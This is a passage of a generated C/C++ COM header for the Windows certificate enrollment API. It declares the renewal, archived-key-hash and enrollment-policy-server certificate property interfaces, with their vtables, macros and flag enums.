            /* [in] */ __RPC__in BSTR strRenewalValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificateHash( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Renewal( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyRenewalVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyRenewal * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyRenewal * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyRenewal * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificateHash )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Renewal )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyRenewalVtbl;

    interface ICertPropertyRenewal
    {
        CONST_VTBL struct ICertPropertyRenewalVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyRenewal_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyRenewal_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyRenewal_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyRenewal_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyRenewal_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyRenewal_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyRenewal_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyRenewal_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyRenewal_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyRenewal_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyRenewal_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyRenewal_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyRenewal_Initialize(This,Encoding,strRenewalValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strRenewalValue) ) 

#define ICertPropertyRenewal_InitializeFromCertificateHash(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificateHash(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyRenewal_get_Renewal(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Renewal(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyRenewal_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__
#define __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__

/* interface ICertPropertyArchivedKeyHash */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyArchivedKeyHash;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33b-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyArchivedKeyHash : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strArchivedKeyHashValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ArchivedKeyHash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyArchivedKeyHashVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyArchivedKeyHash * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyArchivedKeyHash * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyArchivedKeyHash * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strArchivedKeyHashValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivedKeyHash )( 
            __RPC__in ICertPropertyArchivedKeyHash * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyArchivedKeyHashVtbl;

    interface ICertPropertyArchivedKeyHash
    {
        CONST_VTBL struct ICertPropertyArchivedKeyHashVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyArchivedKeyHash_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyArchivedKeyHash_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyArchivedKeyHash_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyArchivedKeyHash_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyArchivedKeyHash_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyArchivedKeyHash_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyArchivedKeyHash_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyArchivedKeyHash_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchivedKeyHash_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyArchivedKeyHash_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyArchivedKeyHash_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyArchivedKeyHash_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyArchivedKeyHash_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchivedKeyHash_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyArchivedKeyHash_Initialize(This,Encoding,strArchivedKeyHashValue)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strArchivedKeyHashValue) ) 

#define ICertPropertyArchivedKeyHash_get_ArchivedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_ArchivedKeyHash(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyArchivedKeyHash_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0061 */
/* [local] */ 

typedef 
enum EnrollmentPolicyServerPropertyFlags
    {
        DefaultNone	= 0,
        DefaultPolicyServer	= 0x1
    } 	EnrollmentPolicyServerPropertyFlags;

typedef 
enum PolicyServerUrlFlags
    {
        PsfNone	= 0,
        PsfLocationGroupPolicy	= 1,
        PsfLocationRegistry	= 2,
        PsfUseClientId	= 4,
        PsfAutoEnrollmentEnabled	= 16,
        PsfAllowUnTrustedCA	= 32
    } 	PolicyServerUrlFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0061_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0061_v0_0_s_ifspec;

#ifndef __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__
#define __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__

/* interface ICertPropertyEnrollmentPolicyServer */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyEnrollmentPolicyServer;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab34a-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyEnrollmentPolicyServer : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EnrollmentPolicyServerPropertyFlags PropertyFlags,
            /* [in] */ X509EnrollmentAuthFlags AuthFlags,
            /* [in] */ X509EnrollmentAuthFlags EnrollmentServerAuthFlags,
            /* [in] */ PolicyServerUrlFlags UrlFlags,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strUrl,
            /* [in] */ __RPC__in BSTR strId,
            /* [in] */ __RPC__in BSTR strEnrollmentServerUrl) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEnrollmentServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPropertyFlags( 
            /* [retval][out] */ __RPC__out EnrollmentPolicyServerPropertyFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetUrlFlags( 
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAuthentication( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEnrollmentServerAuthentication( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyEnrollmentPolicyServerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyEnrollmentPolicyServer * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [in] */ EnrollmentPolicyServerPropertyFlags PropertyFlags,
            /* [in] */ X509EnrollmentAuthFlags AuthFlags,
            /* [in] */ X509EnrollmentAuthFlags EnrollmentServerAuthFlags,
            /* [in] */ PolicyServerUrlFlags UrlFlags,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strUrl,
            /* [in] */ __RPC__in BSTR strId,
            /* [in] */ __RPC__in BSTR strEnrollmentServerUrl);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerUrl )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerId )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEnrollmentServerUrl )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestIdString )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPropertyFlags )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out EnrollmentPolicyServerPropertyFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetUrlFlags )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAuthentication )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEnrollmentServerAuthentication )( 
            __RPC__in ICertPropertyEnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        END_INTERFACE
    } ICertPropertyEnrollmentPolicyServerVtbl;

    interface ICertPropertyEnrollmentPolicyServer
    {
        CONST_VTBL struct ICertPropertyEnrollmentPolicyServerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyEnrollmentPolicyServer_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyEnrollmentPolicyServer_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyEnrollmentPolicyServer_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyEnrollmentPolicyServer_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyEnrollmentPolicyServer_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyEnrollmentPolicyServer_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyEnrollmentPolicyServer_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyEnrollmentPolicyServer_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollmentPolicyServer_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyEnrollmentPolicyServer_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyEnrollmentPolicyServer_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollmentPolicyServer_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyEnrollmentPolicyServer_Initialize(This,PropertyFlags,AuthFlags,EnrollmentServerAuthFlags,UrlFlags,strRequestId,strUrl,strId,strEnrollmentServerUrl)	\
    ( (This)->lpVtbl -> Initialize(This,PropertyFlags,AuthFlags,EnrollmentServerAuthFlags,UrlFlags,strRequestId,strUrl,strId,strEnrollmentServerUrl) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPolicyServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerUrl(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPolicyServerId(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerId(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetEnrollmentServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetEnrollmentServerUrl(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetRequestIdString(This,pValue)	\
    ( (This)->lpVtbl -> GetRequestIdString(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetPropertyFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetPropertyFlags(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetUrlFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetUrlFlags(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetAuthentication(This,pValue)	\
    ( (This)->lpVtbl -> GetAuthentication(This,pValue) ) 

#define ICertPropertyEnrollmentPolicyServer_GetEnrollmentServerAuthentication(This,pValue)	\
    ( (This)->lpVtbl -> GetEnrollmentServerAuthentication(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyEnrollmentPolicyServer_INTERFACE_DEFINED__ */


#ifndef __IX509SignatureInformation_INTERFACE_DEFINED__
